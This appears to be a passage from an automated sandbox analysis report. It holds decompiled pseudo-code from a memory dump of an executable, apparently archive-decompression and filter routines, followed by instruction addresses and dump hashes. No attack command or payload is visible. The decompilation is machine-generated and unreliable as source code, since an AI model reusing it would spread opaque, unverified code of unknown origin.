    														if(_t216 < 0xf) {
    															continue;
    														}
    														goto L85;
    													}
    													_t296 = _t216;
    													goto L85;
    												}
    												_t342 = 0x10;
    												_t423 = _t420 >> _t342 - _t215;
    												_t345 = ( *(_t423 + _t440 + 0x2d7c) & 0x000000ff) +  *(_t438 + 4);
    												 *_t438 =  *_t438 + (_t345 >> 3);
    												 *(_t438 + 4) = _t345 & 0x00000007;
    												_t220 =  *(_t440 + 0x317c + _t423 * 2) & 0x0000ffff;
    												goto L86;
    											}
    											 *_t295 = 2;
    											L33:
    											_t414 =  *(_t455 + 0x14);
    											_t201 =  *(_t455 + 0x18);
    											_t293 =  *(_t455 + 0x3c);
    											continue;
    										}
    										_push(_t455 + 0x28);
    										E008435D7(_t443, _t438);
    										_t295[1] =  *(_t455 + 0x28) & 0x000000ff;
    										_t295[2] =  *(_t455 + 0x2c);
    										_t424 = 4;
    										 *_t295 = _t424;
    										_t233 =  *(_t440 + 0x4ad8);
    										_t349 = _t233 * 0xc +  *(_t440 + 0x4ad4);
    										 *(_t440 + 0x4ad8) = _t233 + 1;
    										_t349[1] =  *(_t455 + 0x34) & 0x000000ff;
    										 *_t349 = _t424;
    										_t349[2] =  *(_t455 + 0x30);
    										goto L33;
    									}
    									_t237 = _t324 - 0x106;
    									__eflags = _t237 - 8;
    									if(_t237 >= 8) {
    										_t350 = 3;
    										_t304 = (_t237 >> 2) - 1;
    										_t237 = (_t237 & _t350 | 0x00000004) << _t304;
    										__eflags = _t237;
    									} else {
    										_t304 = 0;
    									}
    									_t447 = _t237 + 2;
    									 *(_t455 + 0x10) = _t447;
    									__eflags = _t304;
    									if(_t304 != 0) {
    										_t274 = E0083A591(_t438);
    										_t398 = 0x10;
    										_t401 =  *(_t438 + 4) + _t304;
    										 *(_t455 + 0x10) = _t447 + (_t274 >> _t398 - _t304);
    										 *_t438 =  *_t438 + (_t401 >> 3);
    										_t402 = _t401 & 0x00000007;
    										__eflags = _t402;
    										 *(_t438 + 4) = _t402;
    									}
    									_t240 = E0083A591(_t438);
    									_t241 =  *(_t440 + 0xfa0);
    									_t426 = _t240 & 0x0000fffe;
    									__eflags = _t426 -  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4));
    									if(_t426 >=  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4))) {
    										_t305 = 0xf;
    										_t242 = _t241 + 1;
    										__eflags = _t242 - _t305;
    										if(_t242 >= _t305) {
    											L49:
    											_t354 =  *(_t438 + 4) + _t305;
    											 *(_t438 + 4) = _t354 & 0x00000007;
    											_t244 = _t354 >> 3;
    											 *_t438 =  *_t438 + _t244;
    											_t356 = 0x10;
    											_t359 =  *((intOrPtr*)(_t440 + 0xf60 + _t305 * 4)) + (_t426 -  *((intOrPtr*)(_t440 + 0xf1c + _t305 * 4)) >> _t356 - _t305);
    											__eflags = _t359 -  *((intOrPtr*)(_t440 + 0xf1c));
    											asm("sbb eax, eax");
    											_t245 = _t244 & _t359;
    											__eflags = _t245;
    											_t246 =  *(_t440 + 0x1ba4 + _t245 * 2) & 0x0000ffff;
    											goto L50;
    										}
    										_t391 = _t440 + 0xf20 + _t242 * 4;
    										while(1) {
    											__eflags = _t426 -  *_t391;
    											if(_t426 <  *_t391) {
    												break;
    											}
    											_t242 = _t242 + 1;
    											_t391 = _t391 + 4;
    											__eflags = _t242 - 0xf;
    											if(_t242 < 0xf) {
    												continue;
    											}
    											goto L49;
    										}
    										_t305 = _t242;
    										goto L49;
    									} else {
    										_t392 = 0x10;
    										_t434 = _t426 >> _t392 - _t241;
    										_t395 = ( *(_t434 + _t440 + 0xfa4) & 0x000000ff) +  *(_t438 + 4);
    										 *_t438 =  *_t438 + (_t395 >> 3);
    										 *(_t438 + 4) = _t395 & 0x00000007;
    										_t246 =  *(_t440 + 0x13a4 + _t434 * 2) & 0x0000ffff;
    										L50:
    										_t247 = _t246 & 0x0000ffff;
    										__eflags = _t247 - 4;
    										if(_t247 >= 4) {
    											_t308 = (_t247 >> 1) - 1;
    											_t247 = (_t247 & 0x00000001 | 0x00000002) << _t308;
    											__eflags = _t247;
    										} else {
    											_t308 = 0;
    										}
    										_t250 = _t247 + 1;
    										 *(_t455 + 0x20) = _t250;
    										_t448 = _t250;
    										__eflags = _t308;
    										if(_t308 == 0) {
    											L68:
    											__eflags = _t448 - 0x100;
    											if(_t448 > 0x100) {
    												_t253 =  *(_t455 + 0x10) + 1;
    												 *(_t455 + 0x10) = _t253;
    												__eflags = _t448 - 0x2000;
    												if(_t448 > 0x2000) {
    													_t254 = _t253 + 1;
    													 *(_t455 + 0x10) = _t254;
    													__eflags = _t448 - 0x40000;
    													if(_t448 > 0x40000) {
    														_t255 = _t254 + 1;
    														__eflags = _t255;
    														 *(_t455 + 0x10) = _t255;
    													}
    												}
    											}
    											_t251 =  *(_t455 + 0x24);
    											 *_t251 = 1;
    											_t251[1] =  *(_t455 + 0x10);
    											_t251[2] = _t448;
    											goto L91;
    										} else {
    											__eflags = _t308 - 4;
    											if(__eflags < 0) {
    												_t256 = E00847DE9(_t438);
    												_t363 = 0x20;
    												_t448 = (_t256 >> _t363 - _t308) +  *(_t455 + 0x20);
    												_t366 =  *(_t438 + 4) + _t308;
    												 *_t438 =  *_t438 + (_t366 >> 3);
    												_t367 = _t366 & 0x00000007;
    												__eflags = _t367;
    												 *(_t438 + 4) = _t367;
    												goto L68;
    											}
    											if(__eflags > 0) {
    												_t269 = E00847DE9(_t438);
    												_t384 = 0x24;
    												_t448 = (_t269 >> _t384 - _t308 << 4) +  *(_t455 + 0x20);
    												_t388 =  *(_t438 + 4) + 0xfffffffc + _t308;
    												 *_t438 =  *_t438 + (_t388 >> 3);
    												_t389 = _t388 & 0x00000007;
    												__eflags = _t389;
    												 *(_t438 + 4) = _t389;
    											}
    											_t259 = E0083A591(_t438);
    											_t260 =  *(_t440 + 0x1e8c);
    											_t430 = _t259 & 0x0000fffe;
    											__eflags = _t430 -  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4));
    											if(_t430 >=  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4))) {
    												_t309 = 0xf;
    												_t261 = _t260 + 1;
    												__eflags = _t261 - _t309;
    												if(_t261 >= _t309) {
    													L65:
    													_t370 =  *(_t438 + 4) + _t309;
    													 *(_t438 + 4) = _t370 & 0x00000007;
    													_t263 = _t370 >> 3;
    													 *_t438 =  *_t438 + _t263;
    													_t372 = 0x10;
    													_t375 =  *((intOrPtr*)(_t440 + 0x1e4c + _t309 * 4)) + (_t430 -  *((intOrPtr*)(_t440 + 0x1e08 + _t309 * 4)) >> _t372 - _t309);
    													__eflags = _t375 -  *((intOrPtr*)(_t440 + 0x1e08));
    													asm("sbb eax, eax");
    													_t264 = _t263 & _t375;
    													__eflags = _t264;
    													_t265 =  *(_t440 + 0x2a90 + _t264 * 2) & 0x0000ffff;
    													goto L66;
    												}
    												_t377 = _t440 + 0x1e0c + _t261 * 4;
    												while(1) {
    													__eflags = _t430 -  *_t377;
    													if(_t430 <  *_t377) {
    														break;
    													}
    													_t261 = _t261 + 1;
    													_t377 = _t377 + 4;
    													__eflags = _t261 - 0xf;
    													if(_t261 < 0xf) {
    														continue;
    													}
    													goto L65;
    												}
    												_t309 = _t261;
    												goto L65;
    											} else {
    												_t378 = 0x10;
    												_t433 = _t430 >> _t378 - _t260;
    												_t381 = ( *(_t433 + _t440 + 0x1e90) & 0x000000ff) +  *(_t438 + 4);
    												 *_t438 =  *_t438 + (_t381 >> 3);
    												 *(_t438 + 4) = _t381 & 0x00000007;
    												_t265 =  *(_t440 + 0x2290 + _t433 * 2) & 0x0000ffff;
    												L66:
    												_t448 = _t448 + (_t265 & 0x0000ffff);
    												goto L68;
    											}
    										}
    									}
    								}
    								__eflags =  *(_t440 + 0x4ad8) - 1;
    								if( *(_t440 + 0x4ad8) <= 1) {
    									L34:
    									 *_t295 =  *_t295 & 0x00000000;
    									_t295[2] = _t324;
    									_t295[1] = 0;
    									goto L33;
    								}
    								__eflags =  *(_t295 - 0xc);
    								if( *(_t295 - 0xc) != 0) {
    									goto L34;
    								}
    								_t279 =  *(_t295 - 8) & 0x0000ffff;
    								_t435 = 3;
    								__eflags = _t279 - _t435;
    								if(_t279 >= _t435) {
    									goto L34;
    								}
    								_t280 = _t279 + 1;
    								 *(_t295 - 8) = _t280;
    								 *((_t280 & 0x0000ffff) + _t295 - 4) = _t324;
    								_t68 = _t440 + 0x4ad8;
    								 *_t68 =  *(_t440 + 0x4ad8) - 1;
    								__eflags =  *_t68;
    								goto L33;
    							}
    						}
    					}
    					 *((char*)(_t440 + 0x4ad0)) = 1;
    					goto L94;
    				} else {
    					 *((char*)(_t440 + 0x2c)) = 1;
    					_push(_t440 + 0x30);
    					_push(_t440 + 0x18);
    					_push(_t440 + 4);
    					_t291 = E008439F2(__ecx);
    					if(_t291 != 0) {
    						goto L3;
    					} else {
    						 *((char*)(_t440 + 0x4ad0)) = 1;
    						return _t291;
    					}
    				}
    			}






















































































































    0x0084671a
    0x00846720
    0x00846728
    0x0084674f
    0x00846752
    0x00846758
    0x0084675b
    0x0084675d
    0x00846775
    0x0084677c
    0x0084677e
    0x00846781
    0x00846785
    0x0084678a
    0x0084678c
    0x0084678e
    0x00846790
    0x00846790
    0x00846792
    0x00846796
    0x00846796
    0x00846798
    0x0084679a
    0x00000000
    0x00000000
    0x0084679c
    0x0084679c
    0x0084679e
    0x00846d15
    0x00846d16
    0x00000000
    0x00846d16
    0x008467a4
    0x008467b2
    0x008467b2
    0x008467b4
    0x008467c3
    0x008467c3
    0x008467c9
    0x00846d0e
    0x00846d0e
    0x00000000
    0x00846d0e
    0x00000000
    0x008467c9
    0x008467b6
    0x008467bd
    0x00000000
    0x00000000
    0x00000000
    0x008467bd
    0x008467a6
    0x008467a9
    0x008467ac
    0x00000000
    0x00000000
    0x00000000
    0x008467cf
    0x008467cf
    0x008467d8
    0x008467de
    0x008467e0
    0x008467e3
    0x008467ec
    0x008467ed
    0x008467f8
    0x008467fc
    0x008467fe
    0x00846805
    0x00846805
    0x0084680a
    0x0084680a
    0x00846810
    0x0084681b
    0x00846822
    0x00846826
    0x0084682c
    0x00846833
    0x00846839
    0x0084683f
    0x00846843
    0x00846870
    0x00846871
    0x00846872
    0x00846874
    0x0084688d
    0x00846890
    0x00846897
    0x0084689a
    0x0084689d
    0x008468a5
    0x008468ae
    0x008468b2
    0x008468b4
    0x008468b7
    0x008468b9
    0x008468b9
    0x008468bb
    0x00000000
    0x008468bb
    0x00846879
    0x0084687c
    0x0084687c
    0x0084687e
    0x00000000
    0x00000000
    0x00846880
    0x00846881
    0x00846884
    0x00846887
    0x00000000
    0x00000000
    0x00000000
    0x00846889
    0x0084688b
    0x00000000
    0x00846845
    0x00846847
    0x0084684a
    0x00846854
    0x0084685c
    0x00846861
    0x00846864
    0x008468c3
    0x008468c8
    0x008468ca
    0x00846918
    0x0084691e
    0x00846b91
    0x00846b93
    0x00846be4
    0x00846bea
    0x00846bf9
    0x00846bfa
    0x00846c04
    0x00846c07
    0x00846c0e
    0x00846c14
    0x00846c1a
    0x00846c21
    0x00846c4e
    0x00846c4f
    0x00846c50
    0x00846c52
    0x00846c6e
    0x00846c71
    0x00846c78
    0x00846c7b
    0x00846c7e
    0x00846c89
    0x00846c95
    0x00846c97
    0x00846c9d
    0x00846c9f
    0x00846c9f
    0x00846ca1
    0x00846ca9
    0x00846ca9
    0x00846cac
    0x00846caf
    0x00846cbd
    0x00846cc0
    0x00846cc8
    0x00846ccb
    0x00846ccd
    0x00846cd1
    0x00846cd8
    0x00846ce0
    0x00846ce2
    0x00846ce9
    0x00846ceb
    0x00846ceb
    0x00846cee
    0x00846cee
    0x00846cb1
    0x00846cb1
    0x00846cb1
    0x00846cf5
    0x00846cf9
    0x00846cf9
    0x00846cfd
    0x00846d01
    0x00846d05
    0x00846796
    0x00846796
    0x00846798
    0x0084679a
    0x00000000
    0x00000000
    0x00000000
    0x0084679a
    0x00846796
    0x00846c5a
    0x00846c5d
    0x00846c5d
    0x00846c5f
    0x00000000
    0x00000000
    0x00846c61
    0x00846c62
    0x00846c65
    0x00846c68
    0x00000000
    0x00000000
    0x00000000
    0x00846c6a
    0x00846c6c
    0x00000000
    0x00846c6c
    0x00846c25
    0x00846c28
    0x00846c32
    0x00846c3a
    0x00846c3f
    0x00846c42
    0x00000000
    0x00846c42
    0x00846bec
    0x008468f9
    0x008468f9
    0x008468fd
    0x00846901
    0x00000000
    0x00846901
    0x00846b9b
    0x00846b9d
    0x00846ba7
    0x00846baf
    0x00846bb4
    0x00846bb5
    0x00846bb7
    0x00846bc0
    0x00846bc7
    0x00846bd2
    0x00846bda
    0x00846bdc
    0x00000000
    0x00846bdc
    0x00846924
    0x0084692a
    0x0084692d
    0x0084693a
    0x0084693d
    0x00846943
    0x00846943
    0x0084692f
    0x0084692f
    0x0084692f
    0x00846945
    0x00846948
    0x0084694c
    0x0084694e
    0x00846952
    0x00846959
    0x00846963
    0x00846965
    0x0084696e
    0x00846970
    0x00846970
    0x00846973
    0x00846973
    0x00846978
    0x0084697f
    0x00846985
    0x0084698b
    0x00846992
    0x008469bf
    0x008469c0
    0x008469c1
    0x008469c3
    0x008469df
    0x008469e2
    0x008469e9
    0x008469ec
    0x008469ef
    0x008469fa
    0x00846a06
    0x00846a08
    0x00846a0e
    0x00846a10
    0x00846a10
    0x00846a12
    0x00000000
    0x00846a12
    0x008469cb
    0x008469ce
    0x008469ce
    0x008469d0
    0x00000000
    0x00000000
    0x008469d2
    0x008469d3
    0x008469d6
    0x008469d9
    0x00000000
    0x00000000
    0x00000000
    0x008469db
    0x008469dd
    0x00000000
    0x00846994
    0x00846996
    0x00846999
    0x008469a3
    0x008469ab
    0x008469b0
    0x008469b3
    0x00846a1a
    0x00846a1a
    0x00846a1d
    0x00846a20
    0x00846a30
    0x00846a33
    0x00846a33
    0x00846a22
    0x00846a22
    0x00846a22
    0x00846a35
    0x00846a36
    0x00846a3a
    0x00846a3c
    0x00846a3e
    0x00846b4c
    0x00846b4c
    0x00846b52
    0x00846b58
    0x00846b59
    0x00846b5d
    0x00846b63
    0x00846b65
    0x00846b66
    0x00846b6a
    0x00846b70
    0x00846b72
    0x00846b72
    0x00846b73
    0x00846b73
    0x00846b70
    0x00846b63
    0x00846b77
    0x00846b7f
    0x00846b85
    0x00846b89
    0x00000000
    0x00846a44
    0x00846a44
    0x00846a47
    0x00846b28
    0x00846b31
    0x00846b39
    0x00846b3d
    0x00846b44
    0x00846b46
    0x00846b46
    0x00846b49
    0x00000000
    0x00846b49
    0x00846a4d
    0x00846a51
    0x00846a5a
    0x00846a68
    0x00846a6c
    0x00846a73
    0x00846a75
    0x00846a75
    0x00846a78
    0x00846a78
    0x00846a7d
    0x00846a84
    0x00846a8a
    0x00846a90
    0x00846a97
    0x00846ac4
    0x00846ac5
    0x00846ac6
    0x00846ac8
    0x00846ae4
    0x00846ae7
    0x00846aee
    0x00846af1
    0x00846af4
    0x00846aff
    0x00846b0b
    0x00846b0d
    0x00846b13
    0x00846b15
    0x00846b15
    0x00846b17
    0x00000000
    0x00846b17
    0x00846ad0
    0x00846ad3
    0x00846ad3
    0x00846ad5
    0x00000000
    0x00000000
    0x00846ad7
    0x00846ad8
    0x00846adb
    0x00846ade
    0x00000000
    0x00000000
    0x00000000
    0x00846ae0
    0x00846ae2
    0x00000000
    0x00846a99
    0x00846a9b
    0x00846a9e
    0x00846aa8
    0x00846ab0
    0x00846ab5
    0x00846ab8
    0x00846b1f
    0x00846b22
    0x00000000
    0x00846b22
    0x00846a97
    0x00846a3e
    0x00846992
    0x008468cc
    0x008468d3
    0x0084690a
    0x0084690a
    0x0084690f
    0x00846912
    0x00000000
    0x00846912
    0x008468d5
    0x008468d9
    0x00000000
    0x00000000
    0x008468db
    0x008468e1
    0x008468e2
    0x008468e5
    0x00000000
    0x00000000
    0x008468e7
    0x008468e8
    0x008468ef
    0x008468f3
    0x008468f3
    0x008468f3
    0x00000000
    0x008468f3
    0x00846843
    0x00846796
    0x0084675f
    0x00000000
    0x0084672a
    0x0084672d
    0x00846731
    0x00846735
    0x00846739
    0x0084673a
    0x00846741
    0x00000000
    0x00846743
    0x00846743
    0x00000000
    0x00846743
    0x00846741

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 9f66429ba08b60a48171dd6a99d756ec69d598a274b11932ab88dfd3645e5d64
    • Instruction ID: 5b76dac38ffad9301cc69db56d0ffe3838e1c1f841940a67dbb133441f44bc23
    • Opcode Fuzzy Hash: 9f66429ba08b60a48171dd6a99d756ec69d598a274b11932ab88dfd3645e5d64
    • Instruction Fuzzy Hash: 2312D3B160470A8BC729CF28C9D06B9B7E1FF55308F14893ED597C7A81E774A8A4CB46
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0083BB6E(signed int* __ecx) {
    				void* __edi;
    				signed int _t194;
    				signed int _t197;
    				void* _t204;
    				signed char _t205;
    				signed int _t215;
    				signed int _t217;
    				signed int _t218;
    				intOrPtr _t219;
    				signed int _t221;
    				signed int _t223;
    				void* _t234;
    				signed int _t235;
    				signed int _t238;
    				signed int _t266;
    				void* _t267;
    				void* _t268;
    				void* _t269;
    				void* _t270;
    				void* _t271;
    				signed int _t274;
    				intOrPtr _t275;
    				void* _t276;
    				signed char* _t277;
    				signed int _t278;
    				signed int _t279;
    				signed int _t281;
    				char _t282;
    				signed int _t284;
    				signed int _t285;
    				signed char _t289;
    				void* _t290;
    				intOrPtr _t292;
    				signed int _t293;
    				signed char* _t297;
    				signed int _t304;
    				signed int _t306;
    				signed int _t308;
    				signed char _t309;
    				signed int _t310;
    				intOrPtr _t311;
    				void* _t312;
    				void* _t313;
    				unsigned int _t316;
    				signed int _t317;
    				signed int _t319;
    				signed int _t320;
    				signed int _t321;
    				signed int _t322;
    				signed char _t323;
    				signed int _t324;
    				signed int _t325;
    				void* _t326;
    				void* _t327;
    				void* _t328;
    				signed int _t331;
    				signed char _t332;
    				signed int _t333;
    				signed char* _t334;
    				signed int _t335;
    				signed int _t336;
    				signed char _t338;
    				unsigned int _t340;
    				signed int _t345;
    				void* _t350;
    				signed int _t351;
    				signed int _t352;
    				signed int _t353;
    				void* _t354;
    				void* _t355;
    
    				_t311 =  *((intOrPtr*)(_t355 + 4));
    				_t339 = __ecx;
    				if(_t311 <= 0) {
    					L15:
    					return 1;
    				}
    				if(_t311 <= 2) {
    					_t194 = __ecx[5];
    					_t284 =  *__ecx;
    					_t340 = __ecx[7];
    					_t276 = _t194 - 4;
    					if(_t276 > 0x3fffc) {
    						L98:
    						return 0;
    					}
    					_t326 = 0;
    					_t197 = (_t194 & 0xffffff00 | _t311 == 0x00000002) + 0xe8;
    					 *(_t355 + 0x60) = _t197;
    					if(_t276 == 0) {
    						goto L15;
    					} else {
    						goto L88;
    					}
    					do {
    						L88:
    						_t312 =  *_t284;
    						_t284 = _t284 + 1;
    						_t327 = _t326 + 1;
    						_t340 = _t340 + 1;
    						if(_t312 == 0xe8 || _t312 == _t197) {
    							_t313 =  *_t284;
    							if(_t313 >= 0) {
    								_t191 = _t313 - 0x1000000; // -16777215
    								if(_t191 < 0) {
    									 *_t284 = _t313 - _t340;
    								}
    							} else {
    								if(_t340 + _t313 >= 0) {
    									_t190 = _t313 + 0x1000000; // 0x1000001
    									 *_t284 = _t190;
    								}
    							}
    							_t197 =  *(_t355 + 0x60);
    							_t284 = _t284 + 4;
    							_t326 = _t327 + 4;
    							_t340 = _t340 + 4;
    						}
    					} while (_t326 < _t276);
    					goto L15;
    				}
    				if(_t311 == 3) {
    					_t277 =  *__ecx;
    					_t328 = __ecx[5] - 0x15;
    					if(_t328 > 0x3ffeb) {
    						goto L98;
    					}
    					_t316 = __ecx[7] >> 4;
    					 *(_t355 + 0x28) = _t316;
    					if(_t328 == 0) {
    						goto L15;
    					}
    					_t331 = (_t328 - 1 >> 4) + 1;
    					 *(_t355 + 0x30) = _t331;
    					do {
    						_t204 = ( *_t277 & 0x1f) - 0x10;
    						if(_t204 < 0) {
    							goto L84;
    						}
    						_t205 =  *((intOrPtr*)(_t204 + 0x86d070));
    						if(_t205 == 0) {
    							goto L84;
    						}
    						_t332 =  *(_t355 + 0x28);
    						_t285 = 0;
    						_t317 = _t205 & 0x000000ff;
    						 *((intOrPtr*)(_t355 + 0x64)) = 0;
    						 *(_t355 + 0x38) = _t317;
    						_t350 = 0x12;
    						do {
    							if((_t317 & 1) != 0) {
    								_t175 = _t350 + 0x18; // 0x2a
    								if(E0083C0D7(_t277, _t175, 4) == 5) {
    									E0083C122(_t277, E0083C0D7(_t277, _t350, 0x14) - _t332 & 0x000fffff, _t350, 0x14);
    								}
    								_t317 =  *(_t355 + 0x34);
    								_t285 =  *(_t355 + 0x60);
    							}
    							_t285 = _t285 + 1;
    							_t350 = _t350 + 0x29;
    							 *(_t355 + 0x60) = _t285;
    						} while (_t350 <= 0x64);
    						_t331 =  *(_t355 + 0x30);
    						_t316 =  *(_t355 + 0x28);
    						L84:
    						_t277 =  &(_t277[0x10]);
    						_t316 = _t316 + 1;
    						_t331 = _t331 - 1;
    						 *(_t355 + 0x28) = _t316;
    						 *(_t355 + 0x30) = _t331;
    					} while (_t331 != 0);
    					goto L15;
    				}
    				if(_t311 == 4) {
    					_t215 = __ecx[1];
    					_t289 = __ecx[5];
    					_t333 = __ecx[2];
    					 *(_t355 + 0x60) = _t215;
    					_t278 = _t215 - 3;
    					 *(_t355 + 0x28) = _t289;
    					 *(_t355 + 0x34) = _t278;
    					 *(_t355 + 0x3c) = _t333;
    					if(_t289 - 3 > 0x1fffd || _t278 > _t289 || _t333 > 2) {
    						goto L98;
    					} else {
    						_t217 =  *__ecx;
    						 *(_t355 + 0x24) = _t217;
    						_t351 = _t217 + _t289;
    						_t218 = 0;
    						 *(_t355 + 0x14) = _t351;
    						_t319 = _t351 - _t278;
    						 *(_t355 + 0x1c) = 0;
    						 *(_t355 + 0x10) = _t319;
    						do {
    							_t279 = 0;
    							if(_t218 >= _t289) {
    								goto L67;
    							}
    							_t334 = _t319 + _t218;
    							_t320 =  *(_t355 + 0x60);
    							_t221 =  *(_t355 + 0x34) - _t351;
    							_t352 =  *(_t355 + 0x34);
    							 *(_t355 + 0x20) = _t221;
    							do {
    								if( &(_t334[_t221]) >= _t320) {
    									_t227 =  *_t334 & 0x000000ff;
    									_t291 =  *(_t334 - 3) & 0x000000ff;
    									 *(_t355 + 0x30) =  *_t334 & 0x000000ff;
    									 *(_t355 + 0x2c) =  *(_t334 - 3) & 0x000000ff;
    									 *(_t355 + 0x3c) = E00854EA7(_t320, _t227 - _t291 + _t279 - _t279);
    									 *(_t355 + 0x24) = E00854EA7(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x34));
    									_t234 = E00854EA7(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x34));
    									_t292 =  *((intOrPtr*)(_t355 + 0x44));
    									_t355 = _t355 + 0xc;
    									_t321 =  *(_t355 + 0x18);
    									if(_t292 > _t321 || _t292 > _t234) {
    										_t289 =  *(_t355 + 0x28);
    										_t320 =  *(_t355 + 0x60);
    										_t279 =  *(_t355 + 0x30);
    										if(_t321 > _t234) {
    											_t279 =  *(_t355 + 0x2c);
    										}
    									} else {
    										_t289 =  *(_t355 + 0x28);
    										_t320 =  *(_t355 + 0x60);
    									}
    								}
    								_t223 =  *(_t355 + 0x24);
    								_t279 = _t279 -  *_t223 & 0x000000ff;
    								 *(_t355 + 0x24) = _t223 + 1;
    								_t334[_t352] = _t279;
    								_t334 =  &(_t334[3]);
    								_t221 =  *(_t355 + 0x20);
    							} while ( &(_t334[ *(_t355 + 0x20)]) < _t289);
    							_t351 =  *(_t355 + 0x14);
    							_t218 =  *(_t355 + 0x1c);
    							_t319 =  *(_t355 + 0x10);
    							L67:
    							_t218 = _t218 + 1;
    							 *(_t355 + 0x1c) = _t218;
    						} while (_t218 < 3);
    						_t335 =  *(_t355 + 0x3c);
    						_t290 = _t289 + 0xfffffffe;
    						while(_t335 < _t290) {
    							_t219 =  *((intOrPtr*)(_t335 + _t351 + 1));
    							 *((intOrPtr*)(_t335 + _t351)) =  *((intOrPtr*)(_t335 + _t351)) + _t219;
    							 *((intOrPtr*)(_t335 + _t351 + 2)) =  *((intOrPtr*)(_t335 + _t351 + 2)) + _t219;
    							_t335 = _t335 + 3;
    						}
    						goto L15;
    					}
    				}
    				if(_t311 == 5) {
    					_t235 = __ecx[5];
    					_t293 =  *__ecx;
    					_t281 = __ecx[1];
    					 *(_t355 + 0x2c) = _t293;
    					 *(_t355 + 0x30) = _t235;
    					 *(_t355 + 0x38) = _t293 + _t235;
    					if(_t235 > 0x20000 || _t281 > 0x80 || _t281 == 0) {
    						goto L98;
    					} else {
    						_t336 = 0;
    						 *(_t355 + 0x34) = 0;
    						if(_t281 == 0) {
    							goto L15;
    						} else {
    							goto L21;
    						}
    						do {
    							L21:
    							 *(_t355 + 0x20) =  *(_t355 + 0x20) & 0x00000000;
    							 *(_t355 + 0x1c) =  *(_t355 + 0x1c) & 0x00000000;
    							_t345 = 0;
    							 *(_t355 + 0x18) =  *(_t355 + 0x18) & 0x00000000;
    							_t353 = 0;
    							 *(_t355 + 0x14) =  *(_t355 + 0x14) & 0x00000000;
    							 *(_t355 + 0x60) =  *(_t355 + 0x60) & 0;
    							 *(_t355 + 0x1c) = 0;
    							E0084E920(_t336, _t355 + 0x40, 0, 0x1c);
    							 *(_t355 + 0x34) =  *(_t355 + 0x34) & 0;
    							_t355 = _t355 + 0xc;
    							 *(_t355 + 0x24) = _t336;
    							if(_t336 <  *(_t355 + 0x30)) {
    								_t238 =  *(_t355 + 0x60);
    								do {
    									_t322 =  *(_t355 + 0x1c);
    									 *(_t355 + 0x14) = _t322 -  *(_t355 + 0x18);
    									_t297 =  *(_t355 + 0x2c);
    									 *(_t355 + 0x18) = _t322;
    									_t323 =  *_t297 & 0x000000ff;
    									 *(_t355 + 0x2c) =  &(_t297[1]);
    									_t304 = ( *(_t355 + 0x14) * _t238 + _t345 *  *(_t355 + 0x14) + _t353 *  *(_t355 + 0x1c) +  *(_t355 + 0x20) * 0x00000008 >> 0x00000003 & 0x000000ff) - _t323;
    									 *( *(_t355 + 0x24) +  *(_t355 + 0x38)) = _t304;
    									_t349 = _t323 << 3;
    									 *(_t355 + 0x20) = _t304 -  *(_t355 + 0x20);
    									 *(_t355 + 0x24) = _t304;
    									 *((intOrPtr*)(_t355 + 0x44)) =  *((intOrPtr*)(_t355 + 0x44)) + E00854EA7(_t323, _t323 << 3);
    									 *((intOrPtr*)(_t355 + 0x4c)) =  *((intOrPtr*)(_t355 + 0x4c)) + E00854EA7(_t323, (_t323 << 3) -  *(_t355 + 0x1c));
    									 *((intOrPtr*)(_t355 + 0x54)) =  *((intOrPtr*)(_t355 + 0x54)) + E00854EA7(_t323,  *(_t355 + 0x20) + (_t323 << 3));
    									 *((intOrPtr*)(_t355 + 0x5c)) =  *((intOrPtr*)(_t355 + 0x5c)) + E00854EA7(_t323, (_t323 << 3) -  *(_t355 + 0x20));
    									 *((intOrPtr*)(_t355 + 0x64)) =  *((intOrPtr*)(_t355 + 0x64)) + E00854EA7(_t323,  *(_t355 + 0x24) + _t349);
    									 *((intOrPtr*)(_t355 + 0x6c)) =  *((intOrPtr*)(_t355 + 0x6c)) + E00854EA7(_t323, _t349 -  *(_t355 + 0x14));
    									 *((intOrPtr*)(_t355 + 0x74)) =  *((intOrPtr*)(_t355 + 0x74)) + E00854EA7(_t323, _t349 +  *(_t355 + 0x14));
    									_t355 = _t355 + 0x1c;
    									if(( *(_t355 + 0x28) & 0x0000001f) != 0) {
    										_t345 =  *(_t355 + 0x10);
    										_t238 =  *(_t355 + 0x60);
    									} else {
    										_t324 =  *(_t355 + 0x40);
    										_t266 = 0;
    										 *(_t355 + 0x40) =  *(_t355 + 0x40) & 0;
    										_t308 = 1;
    										do {
    											if( *(_t355 + 0x40 + _t308 * 4) < _t324) {
    												_t324 =  *(_t355 + 0x40 + _t308 * 4);
    												_t266 = _t308;
    											}
    											 *(_t355 + 0x40 + _t308 * 4) =  *(_t355 + 0x40 + _t308 * 4) & 0x00000000;
    											_t308 = _t308 + 1;
    										} while (_t308 < 7);
    										_t345 =  *(_t355 + 0x10);
    										_t267 = _t266 - 1;
    										if(_t267 == 0) {
    											_t238 =  *(_t355 + 0x60);
    											if(_t353 >= 0xfffffff0) {
    												_t353 = _t353 - 1;
    											}
    											goto L49;
    										}
    										_t268 = _t267 - 1;
    										if(_t268 == 0) {
    											_t238 =  *(_t355 + 0x60);
    											if(_t353 < 0x10) {
    												_t353 = _t353 + 1;
    											}
    											goto L49;
    										}
    										_t269 = _t268 - 1;
    										if(_t269 == 0) {
    											_t238 =  *(_t355 + 0x60);
    											if(_t345 < 0xfffffff0) {
    												goto L49;
    											}
    											_t345 = _t345 - 1;
    											L43:
    											 *(_t355 + 0x10) = _t345;
    											goto L49;
    										}
    										_t270 = _t269 - 1;
    										if(_t270 == 0) {
    											_t238 =  *(_t355 + 0x60);
